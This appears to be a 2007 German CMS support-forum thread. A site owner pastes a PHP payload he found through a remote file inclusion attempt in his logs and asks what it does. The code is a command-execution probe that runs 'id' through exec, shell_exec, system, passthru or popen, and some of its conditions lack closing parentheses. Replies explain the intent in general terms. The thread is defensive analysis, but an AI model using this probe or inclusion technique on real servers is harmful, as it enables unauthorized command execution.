BS-Fusion Deutschland

Sicherheit für das Portal

Navigation
Startseite Startseite
Forum Forum
Downloads Downloads
Dokus/Artikel Dokus/Artikel
Kontakt Kontakt
FAQ FAQ
Sicherheitskatalog Sicherheitskatalog
Suche Suche
Informationen
Credits Credits
Forenregeln Forenregeln
RSS Feeds RSS Feeds
Service
Event Calendar Event Calendar
Satzung Satzung
Surftips
IonCube Encoder

Downloads
Neue Downloads
> Greystar
> The Player BSF ...
> Mp3-Player
> Lewitz-Red II
> PD-Stats-Panel ...
Top 5 Downloads
> Security System [16390]
> BS-Fusion [7249]
> Kontaktformular [4803]
> BS Register [4253]
> BS Custom Page ... [3825]
BS-Fusion Deutschland - Diskussionsforum
Benutzername
 Passwort

Registrieren
Forumsuche
Forumregeln
Thema ansehen
BS-Fusion Deutschland > Support - Eigene Infusionen
->> Security System
Vorheriges Thema Nächstes Thema

search
Autor Hackversuch   1  # 5  top
Gelöschter User
Eingetragen am 15.11.2007 18:31
Moin zusammen.
Habe ja ( wem auch immer sei Dank) das Secure auf unserer HP www.sgs-torfteufel.de .
Habe mir mal so eine Adresse aus dem Logfile (welches reichlich gefüllt ist) kopiert und bin auf die Seite gegangen http://www.madinaedu.gov.sa/safeon.txt??. Folgendes prangte dort :
( Ich weiss, dass es sich um auführbaren Code handeln muss - weiss aber mangels PHP-Kenntnisse nicht was er bewirken soll. Vielleicht kann mir das einer von Euch verraten ???)

******Es folgt jetzt der Text der auf dieser Page zu sehen ist

<?php
echo "jimmywho";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec'){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec'){
$res = @shell_exec($cfe);
}
elseif(function_exists('system'){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r")){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

********** Ende Text
 
Autor RE: Hackversuch   2  # 5  top
Gelöschter User
Eingetragen am 19.11.2007 19:28
Danke slaughter.
So ganz befriedigend ist die Antwort dennoch nicht.
Ich weiss immer noch nicht was es denn bewirkt, was nach deiner Meinung keinen Schaden anrichten kann.
 
Autor RE: Hackversuch   3  # 5  top
gozoc
Co-Admin u. Cheftester


User Avatar



Beiträge: 1047
Ort: Bayern
Eingetreten: 22.09.06
Status: Offline
Eingetragen am 19.11.2007 22:20
Die Befehle exec und shell_exec (als Beispiel) sind Versuche direkt auf Linux Befehle der Kommandozeile zu wirken ...
was aber bei den meisten, vernünftig eingestellten Linux Servern so nicht möglich ist.
http://www.wuschelkiste.de/fusion/  
Autor RE: Hackversuch   4  # 5  top
Gelöschter User
Eingetragen am 19.11.2007 22:26
Danke gozoc.
Danke slaughter.
Thread kann geschlossen werden
 
Springe zu Forum:
Ähnliche Themen wie "Hackversuch" [5]
Thema Forum Antworten Letzter Beitrag
anzeige der hackversuche Security System 7 01.12.2009 22:33 von
Hackversuch Teil 3 Security System 6 31.10.2008 00:08 von
Hackversuche Teil2 Security System 8 16.09.2008 19:53 von
Hackversuch Fragen Security System 2 28.03.2007 16:04 von
Hackversuch Security System 1 28.09.2006 22:43 von Silvermoon
Thema verlinken
URL:
BB-Code:
HTML:
© COMBRIX CMS Software v1.01.6 based on PHP-Fusion v6. Thanks to the founder Nick Jones
Design by: David Herreman | COMBRIX-Themes by Janilein (R.I.P. my friend)		6,432,785 eindeutige Besuche
render time: 0.301 sec.